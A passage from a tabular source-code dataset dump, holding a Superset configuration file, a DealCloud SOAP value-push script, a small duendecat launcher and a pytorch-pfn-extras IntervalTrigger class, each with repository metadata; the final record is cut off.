hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a04bfc233dec377cd5cb3432a42d3e315ec495b
| 22,759
|
py
|
Python
|
extra/docker/latest/config/config.py
|
ExentriqLtd/exentriq-advanced-analytics
|
a7a45af97e8e7956bbf389bb952d625c69ddc626
|
[
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | null | null | null |
extra/docker/latest/config/config.py
|
ExentriqLtd/exentriq-advanced-analytics
|
a7a45af97e8e7956bbf389bb952d625c69ddc626
|
[
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | null | null | null |
extra/docker/latest/config/config.py
|
ExentriqLtd/exentriq-advanced-analytics
|
a7a45af97e8e7956bbf389bb952d625c69ddc626
|
[
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=C,R,W
"""The main config file for Superset
All configuration in this file can be overridden by providing a superset_config
in your PYTHONPATH as there is a ``from superset_config import *``
at the end of this file.
"""
from collections import OrderedDict
import imp
import json
import os
import sys
from celery.schedules import crontab
from dateutil import tz
from flask_appbuilder.security.manager import AUTH_DB
from superset.stats_logger import DummyStatsLogger
from superset.exentriq import CustomSecurityManager
# Realtime stats logger, a StatsD implementation exists
# DummyStatsLogger is a no-op; swap in a StatsD-backed logger for real metrics.
STATS_LOGGER = DummyStatsLogger()
# Absolute path of the directory containing this config file.
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
# Data directory: honor $SUPERSET_HOME when set, otherwise fall back to
# ~/.superset in the current user's home directory.
DATA_DIR = os.environ.get(
    'SUPERSET_HOME', os.path.join(os.path.expanduser('~'), '.superset'))
# ---------------------------------------------------------
# Superset specific config
# ---------------------------------------------------------
# The application version is read from the bundled static assets' package.json.
PACKAGE_DIR = os.path.join(BASE_DIR, 'static', 'assets')
PACKAGE_FILE = os.path.join(PACKAGE_DIR, 'package.json')
with open(PACKAGE_FILE) as f:
    VERSION_STRING = json.load(f)['version']
# Default row limit for queries powering charts/tables.
ROW_LIMIT = 50000
VIZ_ROW_LIMIT = 10000
# max rows retrieved by filter select auto complete
FILTER_SELECT_ROW_LIMIT = 10000
SUPERSET_WORKERS = 2  # deprecated
SUPERSET_CELERY_WORKERS = 32  # deprecated
SUPERSET_WEBSERVER_ADDRESS = '0.0.0.0'
SUPERSET_WEBSERVER_PORT = 8088
# This is an important setting, and should be lower than your
# [load balancer / proxy / envoy / kong / ...] timeout settings.
# You should also make sure to configure your WSGI server
# (gunicorn, nginx, apache, ...) timeout setting to be <= to this setting
SUPERSET_WEBSERVER_TIMEOUT = 60
SUPERSET_DASHBOARD_POSITION_DATA_LIMIT = 65535
# NOTE(review): EMAIL_NOTIFICATIONS is assigned again in the smtp section
# further down this file; the later assignment wins at import time.
EMAIL_NOTIFICATIONS = False
# Custom security manager plugged into Flask-AppBuilder (Exentriq SSO).
CUSTOM_SECURITY_MANAGER = CustomSecurityManager
SQLALCHEMY_TRACK_MODIFICATIONS = False
# ---------------------------------------------------------
# Your App secret key
# NOTE(review): '\e', '\y' and '\h' are not recognized escape sequences, so
# Python keeps the backslashes literally; this default key must be overridden
# (via superset_config) in any real deployment.
SECRET_KEY = '\2\1thisismyscretkey\1\2\e\y\y\h'  # noqa
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(DATA_DIR, 'superset.db')
# SQLALCHEMY_DATABASE_URI = 'mysql://myapp@localhost/myapp'
# SQLALCHEMY_DATABASE_URI = 'postgresql://root:password@localhost/myapp'
# In order to hook up a custom password store for all SQLACHEMY connections
# implement a function that takes a single argument of type 'sqla.engine.url',
# returns a password and set SQLALCHEMY_CUSTOM_PASSWORD_STORE.
#
# e.g.:
# def lookup_password(url):
#     return 'secret'
# SQLALCHEMY_CUSTOM_PASSWORD_STORE = lookup_password
# The limit of queries fetched for query search
QUERY_SEARCH_LIMIT = 1000
# Flask-WTF flag for CSRF
# NOTE(review): CSRF protection is disabled globally here — confirm this is
# intentional for this deployment before shipping.
WTF_CSRF_ENABLED = False
# Add endpoints that need to be exempt from CSRF protection
WTF_CSRF_EXEMPT_LIST = ['superset.views.core.log', 'superset.views.api.login', 'superset.views.api.dashboards']
# Whether to run the web server in debug mode or not
DEBUG = os.environ.get('FLASK_ENV') == 'development'
FLASK_USE_RELOAD = True
# Whether to show the stacktrace on 500 error
SHOW_STACKTRACE = True
# Extract and use X-Forwarded-For/X-Forwarded-Proto headers?
ENABLE_PROXY_FIX = False
# ------------------------------
# GLOBALS FOR APP Builder
# ------------------------------
# Uncomment to setup Your App name
APP_NAME = 'Superset'
# Uncomment to setup an App icon
APP_ICON = '/static/assets/images/superset-logo@2x.png'
APP_ICON_WIDTH = 126
# Uncomment to specify where clicking the logo would take the user
# e.g. setting it to '/welcome' would take the user to '/superset/welcome'
LOGO_TARGET_PATH = None
# Druid query timezone
# tz.tzutc() : Using utc timezone
# tz.tzlocal() : Using local timezone
# tz.gettz('Asia/Shanghai') : Using the time zone with specific name
# [TimeZone List]
# See: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
# other tz can be overridden by providing a local_config
DRUID_IS_ACTIVE = True
DRUID_TZ = tz.tzutc()
DRUID_ANALYSIS_TYPES = ['cardinality']
# ----------------------------------------------------
# AUTHENTICATION CONFIG
# ----------------------------------------------------
# The authentication type
# AUTH_OID : Is for OpenID
# AUTH_DB : Is for database (username/password()
# AUTH_LDAP : Is for LDAP
# AUTH_REMOTE_USER : Is for using REMOTE_USER from web server
AUTH_TYPE = AUTH_DB
# Uncomment to setup Full admin role name
# AUTH_ROLE_ADMIN = 'Admin'
# Uncomment to setup Public role name, no authentication needed
# AUTH_ROLE_PUBLIC = 'Public'
# Will allow user self registration
# AUTH_USER_REGISTRATION = True
# The default user self registration role
# AUTH_USER_REGISTRATION_ROLE = "Public"
# When using LDAP Auth, setup the ldap server
# AUTH_LDAP_SERVER = "ldap://ldapserver.new"
# Uncomment to setup OpenID providers example for OpenID authentication
# OPENID_PROVIDERS = [
#     { 'name': 'Yahoo', 'url': 'https://open.login.yahoo.com/' },
#     { 'name': 'Flickr', 'url': 'https://www.flickr.com/<username>' },
# ]
# ---------------------------------------------------
# Roles config
# ---------------------------------------------------
# Grant public role the same set of permissions as for the GAMMA role.
# This is useful if one wants to enable anonymous users to view
# dashboards. Explicit grant on specific datasets is still required.
PUBLIC_ROLE_LIKE_GAMMA = False
# ---------------------------------------------------
# Babel config for translations
# ---------------------------------------------------
# Setup default language
BABEL_DEFAULT_LOCALE = 'en'
# Your application default translation path
BABEL_DEFAULT_FOLDER = 'superset/translations'
# The allowed translation for you app
LANGUAGES = {
    'en': {'flag': 'us', 'name': 'English'},
    'it': {'flag': 'it', 'name': 'Italian'},
    'fr': {'flag': 'fr', 'name': 'French'},
    'zh': {'flag': 'cn', 'name': 'Chinese'},
    'ja': {'flag': 'jp', 'name': 'Japanese'},
    'de': {'flag': 'de', 'name': 'German'},
    'pt': {'flag': 'pt', 'name': 'Portuguese'},
    'pt_BR': {'flag': 'br', 'name': 'Brazilian Portuguese'},
    'ru': {'flag': 'ru', 'name': 'Russian'},
    'ko': {'flag': 'kr', 'name': 'Korean'},
}
# ---------------------------------------------------
# Feature flags
# ---------------------------------------------------
# Feature flags that are set by default go here. Their values can be
# overwritten by those specified under FEATURE_FLAGS in super_config.py
# For example, DEFAULT_FEATURE_FLAGS = { 'FOO': True, 'BAR': False } here
# and FEATURE_FLAGS = { 'BAR': True, 'BAZ': True } in superset_config.py
# will result in combined feature flags of { 'FOO': True, 'BAR': True, 'BAZ': True }
DEFAULT_FEATURE_FLAGS = {
    # Experimental feature introducing a client (browser) cache
    'CLIENT_CACHE': False,
}
# A function that receives a dict of all feature flags
# (DEFAULT_FEATURE_FLAGS merged with FEATURE_FLAGS)
# can alter it, and returns a similar dict. Note the dict of feature
# flags passed to the function is a deepcopy of the dict in the config,
# and can therefore be mutated without side-effect
#
# GET_FEATURE_FLAGS_FUNC can be used to implement progressive rollouts,
# role-based features, or a full on A/B testing framework.
#
# from flask import g, request
# def GET_FEATURE_FLAGS_FUNC(feature_flags_dict):
#     feature_flags_dict['some_feature'] = g.user and g.user.id == 5
#     return feature_flags_dict
GET_FEATURE_FLAGS_FUNC = None
# ---------------------------------------------------
# Image and file configuration
# ---------------------------------------------------
# The file upload folder, when using models with files
UPLOAD_FOLDER = BASE_DIR + '/app/static/uploads/'
# The image upload folder, when using models with images
IMG_UPLOAD_FOLDER = BASE_DIR + '/app/static/uploads/'
# The image upload url, when using models with images
IMG_UPLOAD_URL = '/static/uploads/'
# Setup image size default is (300, 200, True)
# IMG_SIZE = (300, 200, True)
# Default cache TTL: 24 hours (in seconds).
CACHE_DEFAULT_TIMEOUT = 60 * 60 * 24
# 'null' cache type means caching is effectively disabled by default.
CACHE_CONFIG = {'CACHE_TYPE': 'null'}
TABLE_NAMES_CACHE_CONFIG = {'CACHE_TYPE': 'null'}
# CORS Options
ENABLE_CORS = True
CORS_OPTIONS = {}
# Chrome allows up to 6 open connections per domain at a time. When there are more
# than 6 slices in dashboard, a lot of time fetch requests are queued up and wait for
# next available socket. PR #5039 is trying to allow domain sharding for Superset,
# and this feature will be enabled by configuration only (by default Superset
# doesn't allow cross-domain request).
SUPERSET_WEBSERVER_DOMAINS = None
# Allowed format types for upload on Database view
# TODO: Add processing of other spreadsheet formats (xls, xlsx etc)
# Set literal instead of set([...]) — same value, idiomatic form (ruff C405).
ALLOWED_EXTENSIONS = {'csv'}
# CSV Options: key/value pairs that will be passed as argument to DataFrame.to_csv method
# note: index option should not be overridden
CSV_EXPORT = {
    'encoding': 'utf-8',
}
# ---------------------------------------------------
# Time grain configurations
# ---------------------------------------------------
# List of time grains to disable in the application (see list of builtin
# time grains in superset/db_engine_specs.builtin_time_grains).
# For example: to disable 1 second time grain:
# TIME_GRAIN_BLACKLIST = ['PT1S']
TIME_GRAIN_BLACKLIST = []
# Additional time grains to be supported using similar definitions as in
# superset/db_engine_specs.builtin_time_grains.
# For example: To add a new 2 second time grain:
# TIME_GRAIN_ADDONS = {'PT2S': '2 second'}
TIME_GRAIN_ADDONS = {}
# Implementation of additional time grains per engine.
# For example: To implement 2 second time grain on clickhouse engine:
# TIME_GRAIN_ADDON_FUNCTIONS = {
#     'clickhouse': {
#         'PT2S': 'toDateTime(intDiv(toUInt32(toDateTime({col})), 2)*2)'
#     }
# }
TIME_GRAIN_ADDON_FUNCTIONS = {}
# ---------------------------------------------------
# List of viz_types not allowed in your environment
# For example: Blacklist pivot table and treemap:
# VIZ_TYPE_BLACKLIST = ['pivot_table', 'treemap']
# ---------------------------------------------------
VIZ_TYPE_BLACKLIST = []
# ---------------------------------------------------
# List of data sources not to be refreshed in druid cluster
# ---------------------------------------------------
DRUID_DATA_SOURCE_BLACKLIST = []
# --------------------------------------------------
# Modules, datasources and middleware to be registered
# --------------------------------------------------
# OrderedDict preserves registration order of the connector modules.
DEFAULT_MODULE_DS_MAP = OrderedDict([
    ('superset.connectors.sqla.models', ['SqlaTable']),
    ('superset.connectors.druid.models', ['DruidDatasource']),
])
ADDITIONAL_MODULE_DS_MAP = {}
ADDITIONAL_MIDDLEWARE = []
"""
1) https://docs.python-guide.org/writing/logging/
2) https://docs.python.org/2/library/logging.config.html
"""
# Console Log Settings
LOG_FORMAT = '%(asctime)s:%(levelname)s:%(name)s:%(message)s'
LOG_LEVEL = 'DEBUG'
# ---------------------------------------------------
# Enable Time Rotate Log Handler
# ---------------------------------------------------
# LOG_LEVEL = DEBUG, INFO, WARNING, ERROR, CRITICAL
ENABLE_TIME_ROTATE = False
TIME_ROTATE_LOG_LEVEL = 'DEBUG'
FILENAME = os.path.join(DATA_DIR, 'superset.log')
ROLLOVER = 'midnight'
INTERVAL = 1
BACKUP_COUNT = 30
# Custom logger for auditing queries. This can be used to send ran queries to a
# structured immutable store for auditing purposes. The function is called for
# every query ran, in both SQL Lab and charts/dashboards.
# def QUERY_LOGGER(
#     database,
#     query,
#     schema=None,
#     user=None,
#     client=None,
#     security_manager=None,
# ):
#     pass
# Set this API key to enable Mapbox visualizations
MAPBOX_API_KEY = os.environ.get('MAPBOX_API_KEY', '')
# Maximum number of rows returned from a database
# in async mode, no more than SQL_MAX_ROW will be returned and stored
# in the results backend. This also becomes the limit when exporting CSVs
SQL_MAX_ROW = 100000
# Default row limit for SQL Lab queries
DEFAULT_SQLLAB_LIMIT = 1000
# Maximum number of tables/views displayed in the dropdown window in SQL Lab.
MAX_TABLE_NAMES = 3000
# Adds a warning message on sqllab save query modal.
SQLLAB_SAVE_WARNING_MESSAGE = None
# If defined, shows this text in an alert-warning box in the navbar
# one example use case may be "STAGING" to make it clear that this is
# not the production version of the site.
WARNING_MSG = None
# Default celery config is to use SQLA as a broker, in a production setting
# you'll want to use a proper broker as specified here:
# http://docs.celeryproject.org/en/latest/getting-started/brokers/index.html
class CeleryConfig(object):
    # Celery settings container; passed to the worker via CELERY_CONFIG below.
    BROKER_URL = 'sqla+sqlite:///celerydb.sqlite'
    CELERY_IMPORTS = (
        'superset.sql_lab',
        'superset.tasks',
    )
    CELERY_RESULT_BACKEND = 'db+sqlite:///celery_results.sqlite'
    CELERYD_LOG_LEVEL = 'DEBUG'
    # Fetch one task at a time; plays better with long-running queries.
    CELERYD_PREFETCH_MULTIPLIER = 1
    CELERY_ACKS_LATE = True
    CELERY_ANNOTATIONS = {
        'sql_lab.get_sql_results': {
            'rate_limit': '100/s',
        },
        'email_reports.send': {
            # NOTE(review): soft_time_limit (150) exceeds time_limit (120);
            # Celery convention is soft < hard, so the soft limit as written
            # can never fire — confirm whether these were meant to be swapped.
            'rate_limit': '1/s',
            'time_limit': 120,
            'soft_time_limit': 150,
            'ignore_result': True,
        },
    }
    CELERYBEAT_SCHEDULE = {
        'email_reports.schedule_hourly': {
            'task': 'email_reports.schedule_hourly',
            # Run at minute 1 of every hour.
            'schedule': crontab(minute=1, hour='*'),
        },
    }
CELERY_CONFIG = CeleryConfig
"""
# Set celery config to None to disable all the above configuration
CELERY_CONFIG = None
"""
# static http headers to be served by your Superset server.
# This header prevents iFrames from other domains and
# "clickjacking" as a result
# HTTP_HEADERS = {'X-Frame-Options': 'SAMEORIGIN'}
# If you need to allow iframes from other domains (and are
# aware of the risks), you can disable this header:
HTTP_HEADERS = {}
# The db id here results in selecting this one as a default in SQL Lab
DEFAULT_DB_ID = None
# Timeout duration for SQL Lab synchronous queries
SQLLAB_TIMEOUT = 30
# SQLLAB_DEFAULT_DBID
SQLLAB_DEFAULT_DBID = None
# The MAX duration (in seconds) a query can run for before being killed
# by celery.
SQLLAB_ASYNC_TIME_LIMIT_SEC = 60 * 60 * 6
# An instantiated derivative of werkzeug.contrib.cache.BaseCache
# if enabled, it can be used to store the results of long-running queries
# in SQL Lab by using the "Run Async" button/feature
RESULTS_BACKEND = None
# The S3 bucket where you want to store your external hive tables created
# from CSV files. For example, 'companyname-superset'
CSV_TO_HIVE_UPLOAD_S3_BUCKET = None
# The directory within the bucket specified above that will
# contain all the external tables
CSV_TO_HIVE_UPLOAD_DIRECTORY = 'EXTERNAL_HIVE_TABLES/'
# The namespace within hive where the tables created from
# uploading CSVs will be stored.
UPLOADED_CSV_HIVE_NAMESPACE = None
# A dictionary of items that gets merged into the Jinja context for
# SQL Lab. The existing context gets updated with this dictionary,
# meaning values for existing keys get overwritten by the content of this
# dictionary.
JINJA_CONTEXT_ADDONS = {}
# Roles that are controlled by the API / Superset and should not be changes
# by humans.
ROBOT_PERMISSION_ROLES = ['Public', 'Gamma', 'Alpha', 'Admin', 'sql_lab']
CONFIG_PATH_ENV_VAR = 'SUPERSET_CONFIG_PATH'
# If a callable is specified, it will be called at app startup while passing
# a reference to the Flask app. This can be used to alter the Flask app
# in whatever way.
# example: FLASK_APP_MUTATOR = lambda x: x.before_request = f
FLASK_APP_MUTATOR = None
# Set this to false if you don't want users to be able to request/grant
# datasource access requests from/to other users.
ENABLE_ACCESS_REQUEST = False
# smtp server configuration
EMAIL_NOTIFICATIONS = False # all the emails are sent using dryrun
SMTP_HOST = 'localhost'
SMTP_STARTTLS = True
SMTP_SSL = False
SMTP_USER = 'superset'
SMTP_PORT = 25
SMTP_PASSWORD = 'superset'
SMTP_MAIL_FROM = 'superset@superset.com'
if not CACHE_DEFAULT_TIMEOUT:
CACHE_DEFAULT_TIMEOUT = CACHE_CONFIG.get('CACHE_DEFAULT_TIMEOUT')
# Whether to bump the logging level to ERROR on the flask_appbuilder package
# Set to False if/when debugging FAB related issues like
# permission management
SILENCE_FAB = True
# The link to a page containing common errors and their resolutions
# It will be appended at the bottom of sql_lab errors.
TROUBLESHOOTING_LINK = ''
# CSRF token timeout, set to None for a token that never expires
WTF_CSRF_TIME_LIMIT = 60 * 60 * 24 * 7
# This link should lead to a page with instructions on how to gain access to a
# Datasource. It will be placed at the bottom of permissions errors.
PERMISSION_INSTRUCTIONS_LINK = ''
# Integrate external Blueprints to the app by passing them to your
# configuration. These blueprints will get integrated in the app
BLUEPRINTS = []
# Provide a callable that receives a tracking_url and returns another
# URL. This is used to translate internal Hadoop job tracker URL
# into a proxied one
TRACKING_URL_TRANSFORMER = lambda x: x # noqa: E731
# Interval between consecutive polls when using Hive Engine
HIVE_POLL_INTERVAL = 5
# Allow for javascript controls components
# this enables programmers to customize certain charts (like the
# geospatial ones) by inputing javascript in controls. This exposes
# an XSS security vulnerability
ENABLE_JAVASCRIPT_CONTROLS = False
# The id of a template dashboard that should be copied to every new user
DASHBOARD_TEMPLATE_ID = None
# A callable that allows altering the database conneciton URL and params
# on the fly, at runtime. This allows for things like impersonation or
# arbitrary logic. For instance you can wire different users to
# use different connection parameters, or pass their email address as the
# username. The function receives the connection uri object, connection
# params, the username, and returns the mutated uri and params objects.
# Example:
# def DB_CONNECTION_MUTATOR(uri, params, username, security_manager, source):
#     user = security_manager.find_user(username=username)
#     if user and user.email:
#         uri.username = user.email
#     return uri, params
#
# Note that the returned uri and params are passed directly to sqlalchemy's
# as such `create_engine(url, **params)`
DB_CONNECTION_MUTATOR = None
# A function that intercepts the SQL to be executed and can alter it.
# The use case is can be around adding some sort of comment header
# with information such as the username and worker node information
#
# def SQL_QUERY_MUTATOR(sql, username, security_manager):
#     dttm = datetime.now().isoformat()
#     return f"-- [SQL LAB] {username} {dttm}\n{sql}"
SQL_QUERY_MUTATOR = None
# When not using gunicorn, (nginx for instance), you may want to disable
# using flask-compress
ENABLE_FLASK_COMPRESS = True
# Enable / disable scheduled email reports
ENABLE_SCHEDULED_EMAIL_REPORTS = False
# If enabled, certail features are run in debug mode
# Current list:
# * Emails are sent using dry-run mode (logging only)
SCHEDULED_EMAIL_DEBUG_MODE = False
# Email reports - minimum time resolution (in minutes) for the crontab
EMAIL_REPORTS_CRON_RESOLUTION = 15
# Email report configuration
# From address in emails
EMAIL_REPORT_FROM_ADDRESS = 'reports@superset.org'
# Send bcc of all reports to this address. Set to None to disable.
# This is useful for maintaining an audit trail of all email deliveries.
EMAIL_REPORT_BCC_ADDRESS = None
# User credentials to use for generating reports
# This user should have permissions to browse all the dashboards and
# slices.
# TODO: In the future, login as the owner of the item to generate reports
EMAIL_REPORTS_USER = 'admin'
EMAIL_REPORTS_SUBJECT_PREFIX = '[Report] '
# The webdriver to use for generating reports. Use one of the following
# firefox
#   Requires: geckodriver and firefox installations
#   Limitations: can be buggy at times
# chrome:
#   Requires: headless chrome
#   Limitations: unable to generate screenshots of elements
EMAIL_REPORTS_WEBDRIVER = 'firefox'
# Window size - this will impact the rendering of the data
WEBDRIVER_WINDOW = {
    'dashboard': (1600, 2000),
    'slice': (3000, 1200),
}
# Any config options to be passed as-is to the webdriver
WEBDRIVER_CONFIGURATION = {}
# The base URL to query for accessing the user interface
WEBDRIVER_BASEURL = 'http://0.0.0.0:8080/'
# Send user to a link where they can report bugs
BUG_REPORT_URL = None
# Send user to a link where they can read more about Superset
DOCUMENTATION_URL = None
# What is the Last N days relative in the time selector to:
# 'today' means it is midnight (00:00:00) of today in the local timezone
# 'now' means it is relative to the query issue time
DEFAULT_RELATIVE_END_TIME = 'today'
# Is epoch_s/epoch_ms datetime format supposed to be considered since UTC ?
# If not, it is sassumed then the epoch_s/epoch_ms is seconds since 1/1/1970
# localtime (in the tz where the superset webserver is running)
IS_EPOCH_S_TRULY_UTC = False
# Exentriq single-sign-on endpoint used by the custom security manager.
# NOTE(review): 'EXENRIQ' looks like a typo for 'EXENTRIQ'; renaming would
# break consumers of this setting, so it is left as-is.
EXENRIQ_SSO_URL = 'https://www.exentriq.com/JSON-RPC'
# 'None' (string) allows the session cookie in cross-site contexts; requires
# Secure=True to be honored by modern browsers.
SESSION_COOKIE_SAMESITE = 'None'
SESSION_COOKIE_SECURE = True
# Load site-local overrides: either an explicit file pointed at by
# $SUPERSET_CONFIG_PATH, or a `superset_config` module found on PYTHONPATH.
# Every UPPERCASE name in the override module replaces the default above.
try:
    if CONFIG_PATH_ENV_VAR in os.environ:
        # Explicitly import config module that is not in pythonpath; useful
        # for case where app is being executed via pex.
        print('Loaded your LOCAL configuration at [{}]'.format(
            os.environ[CONFIG_PATH_ENV_VAR]))
        module = sys.modules[__name__]
        # NOTE(review): `imp` is deprecated since Python 3.4 (removed in
        # 3.12); importlib.util is the modern replacement.
        override_conf = imp.load_source(
            'superset_config',
            os.environ[CONFIG_PATH_ENV_VAR])
        # Copy every UPPERCASE setting from the override module onto this one.
        for key in dir(override_conf):
            if key.isupper():
                setattr(module, key, getattr(override_conf, key))
    else:
        from superset_config import *  # noqa
        import superset_config
        print('Loaded your LOCAL configuration at [{}]'.format(
            superset_config.__file__))
except ImportError:
    # No override present — run with the defaults defined above.
    pass
| 35.616588
| 111
| 0.70214
|
4a04c10ca743bb743230745a8023932677429bbc
| 2,443
|
py
|
Python
|
examples/push_value_update.py
|
c0gnac/dealcloud-python
|
ee27603e262eb49415fb2620b680a970ee3728a9
|
[
"BSD-3-Clause"
] | 1
|
2020-04-17T08:28:58.000Z
|
2020-04-17T08:28:58.000Z
|
examples/push_value_update.py
|
c0gnac/dealcloud-python
|
ee27603e262eb49415fb2620b680a970ee3728a9
|
[
"BSD-3-Clause"
] | 3
|
2020-04-17T13:26:55.000Z
|
2021-03-31T19:33:49.000Z
|
examples/push_value_update.py
|
jholtio/dealcloud-python
|
995d5a4066441120d2e8f4612ea4c20b658df123
|
[
"BSD-3-Clause"
] | 2
|
2020-04-17T12:53:23.000Z
|
2021-02-27T00:09:39.000Z
|
"""
This script pushes a new value to the EBITDA field for the "Project Genome"
entry on the Deal list
"""
import getpass as gp
import sys
import requests
import zeep
from zeep import xsd
import dealcloud as dc
# Create an instance of a client for the DealCloud Data Service and a service
# proxy
try:
client = dc.create_client(
email=input('Email: '), password=gp.getpass(),
hostname=input('Hostname: ')
)
except requests.exceptions.ConnectionError:
print('Failed to connect to the DealCloud Web Service.')
sys.exit()
service = dc.bind_service(client)
# Find all of the lists in the site and try to find the Deal list by name
lists = service.GetEntryLists()
try:
deal_list = list(filter(lambda l: l.Name == 'Deal', lists))[0]
except IndexError:
print('Deal list could not be found.')
sys.exit()
# Find all of the entries on the Deal list and try to find the 'Project Genome'
# entry by name
entries = service.GetListEntries(deal_list.Id)
try:
deal_entry = list(filter(lambda e: e.Name == 'Project Genome', entries))[0]
except IndexError:
print('Project Genome could not be found.')
sys.exit()
# Find all of the fields on all of the lists in a site, get the EBITDA field on
# the Deal list
fields = service.GetFields()
try:
deal_field = list(filter(
lambda f: f.EntryListId == deal_list.Id and f.Name == 'EBITDA',
fields
))[0]
except IndexError:
print('Fields could not be found.')
sys.exit()
# Create a type factory to access the types provided by the service
factory = client.type_factory('ns0')
# Build the payload for your request and push it
requests = factory.ArrayOfDCPush()
value = xsd.AnyObject(xsd.Decimal(), 1.9)
p = factory.DCPush(EntryId=deal_entry.Id, FieldId=deal_field.Id, Value=value)
requests.DCPush.append(p)
try:
responses = service.ProcessDCPush(
entryListId=deal_list.Id, requests=requests
)
except zeep.exceptions.Fault:
print('An error occurred with the server.')
sys.exit()
# Check your responses for any errors and print messages appropriately
for r in responses:
if r.Error is None:
print(f'Field {r.FieldId} of Entry {r.EntryId} updated successfully.')
else:
print(f'Error occurred for Field {r.FieldId} of Entry {r.EntryId}.')
print(f'Message: {r.Error.Description}')
| 28.406977
| 80
| 0.678264
|
4a04c3b0db032d5fcb57fe0dec6eb6916e0e5589
| 65
|
py
|
Python
|
duendecat.py
|
patarapolw/duen-gui
|
8ad04b4346419d9bfe3cfd6fdad49ca50030d56b
|
[
"MIT"
] | 3
|
2019-03-18T18:34:34.000Z
|
2021-09-09T07:47:59.000Z
|
duendecat.py
|
patarapolw/duen-gui
|
8ad04b4346419d9bfe3cfd6fdad49ca50030d56b
|
[
"MIT"
] | null | null | null |
duendecat.py
|
patarapolw/duen-gui
|
8ad04b4346419d9bfe3cfd6fdad49ca50030d56b
|
[
"MIT"
] | null | null | null |
# NOTE(review): this launcher script shares its filename with the `duendecat`
# module it imports — presumably an installed package of the same name is
# intended; verify the import does not resolve to this file itself.
import duendecat
if __name__ == '__main__':
    # Start the GUI when run as a script.
    duendecat.gui()
| 13
| 26
| 0.692308
|
4a04c3f4c75301cfa2eafd4c7370ebeb54170976
| 3,755
|
py
|
Python
|
pytorch_pfn_extras/training/triggers/interval_trigger.py
|
yasuyuky/pytorch-pfn-extras
|
febea6ded644d3b7a099ac557f06567a04b3b838
|
[
"MIT"
] | null | null | null |
pytorch_pfn_extras/training/triggers/interval_trigger.py
|
yasuyuky/pytorch-pfn-extras
|
febea6ded644d3b7a099ac557f06567a04b3b838
|
[
"MIT"
] | null | null | null |
pytorch_pfn_extras/training/triggers/interval_trigger.py
|
yasuyuky/pytorch-pfn-extras
|
febea6ded644d3b7a099ac557f06567a04b3b838
|
[
"MIT"
] | null | null | null |
from pytorch_pfn_extras.training import trigger
class IntervalTrigger(trigger.Trigger):
    """Trigger that fires once per fixed interval.

    The interval is expressed either in iterations (number of updates) or in
    epochs (sweeps over the training dataset). Epoch intervals may be
    fractional; in that case the manager's ``iteration`` and ``epoch_detail``
    attributes drive the decision.

    For the description of triggers see
    :func:`~pytorch_pfn_extras.get_trigger`.

    Args:
        period (int or float): Length of the interval. Must be an integer if
            unit is ``'iteration'``.
        unit (str): Unit of the length specified by ``period``. It must be
            either ``'iteration'`` or ``'epoch'``.
    """

    def __init__(self, period, unit):
        if unit not in ('epoch', 'iteration'):
            raise ValueError(
                'Trigger unit must be either \'epoch\' or \'iteration\'.')
        self.period = period
        self.unit = unit
        # Progress observed on the previous call; used to detect when the
        # running total crosses a multiple of ``period``.
        self._previous_iteration = 0
        self._previous_epoch_detail = 0.
        # count is kept for backward compatibility
        self.count = 0

    def __call__(self, manager):
        """Decide whether the associated extension should fire now.

        Args:
            manager (~pytorch_pfn_extras.training.ExtensionsManager):
                Manager object that this trigger is associated with; its
                iteration/epoch progress determines the result.

        Returns:
            bool: True if the corresponding extension should be invoked in
            this iteration.
        """
        if self.unit == 'epoch':
            current = manager.epoch_detail
            last = self._previous_epoch_detail
            # A negative saved value is invalid; fall back to the manager's.
            if last < 0:
                last = manager.previous_epoch_detail
            # count is kept for backward compatibility
            self.count = current // self.period
            fire = last // self.period != current // self.period
        else:
            current = manager.iteration
            last = self._previous_iteration
            # A negative saved value is invalid; infer it from the current.
            if last < 0:
                last = current - 1
            fire = last // self.period != current // self.period
        # Remember the progress seen on this call for the next comparison.
        self._previous_iteration = manager.iteration
        if hasattr(manager, 'epoch_detail'):
            self._previous_epoch_detail = manager.epoch_detail
        return fire

    def state_dict(self):
        # Serialize the progress markers under their attribute names.
        return {
            '_previous_iteration': self._previous_iteration,
            '_previous_epoch_detail': self._previous_epoch_detail,
        }

    def load_state_dict(self, to_load):
        self._previous_iteration = to_load['_previous_iteration']
